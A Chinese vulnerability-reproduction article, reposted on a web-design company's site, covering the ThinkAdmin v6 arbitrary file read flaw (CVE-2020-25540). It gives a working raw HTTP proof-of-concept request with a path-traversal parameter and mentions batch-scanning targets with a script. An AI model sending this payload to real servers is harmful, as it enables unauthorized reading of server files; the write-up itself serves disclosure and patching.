网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

如何进行Thinkadminv6任意文件读取漏洞复现

本篇文章为大家展示了如何进行Thinkadmin v6任意文件读取漏洞复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

创新互联是一家集网站建设,屯溪企业网站建设,屯溪品牌网站建设,网站定制,屯溪网站建设报价,网络营销,网络优化,屯溪网站推广为一体的创新建站企业,帮助传统企业提升企业形象加强企业竞争力。可充分满足这一群体相比中小企业更为丰富、高端、多元的互联网需求。同时我们时刻保持专业、时尚、前沿,时刻以成就客户成长自我,坚持不断学习、思考、沉淀、净化自己,让我们为更多的企业打造出实用型网站。

如何进行Thinkadmin v6任意文件读取漏洞复现

Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现

一、漏洞简介:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

二、漏洞成因:

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php中的函数方法未授权,可直接函数可直接调用。导致漏洞

三、影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞复现:

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

简单写了一个批量的小脚本

如何进行Thinkadmin v6任意文件读取漏洞复现

跑了一部分,成功的不多,HVV尾声了,情况也正常。

如何进行Thinkadmin v6任意文件读取漏洞复现

发现一个诡异的地方:burp直接放包不能成功回去json的返回数据

如何进行Thinkadmin v6任意文件读取漏洞复现

python-尝试python的request的post方法可以返回

如何进行Thinkadmin v6任意文件读取漏洞复现

尝试curl的post的方法可以正常返回数据

如何进行Thinkadmin v6任意文件读取漏洞复现

下来再来研究这个问题。

五、修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本

上述内容就是如何进行Thinkadmin v6任意文件读取漏洞复现,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。


新闻标题:如何进行Thinkadminv6任意文件读取漏洞复现
链接URL:http://bjjierui.cn/article/gcjssd.html

其他资讯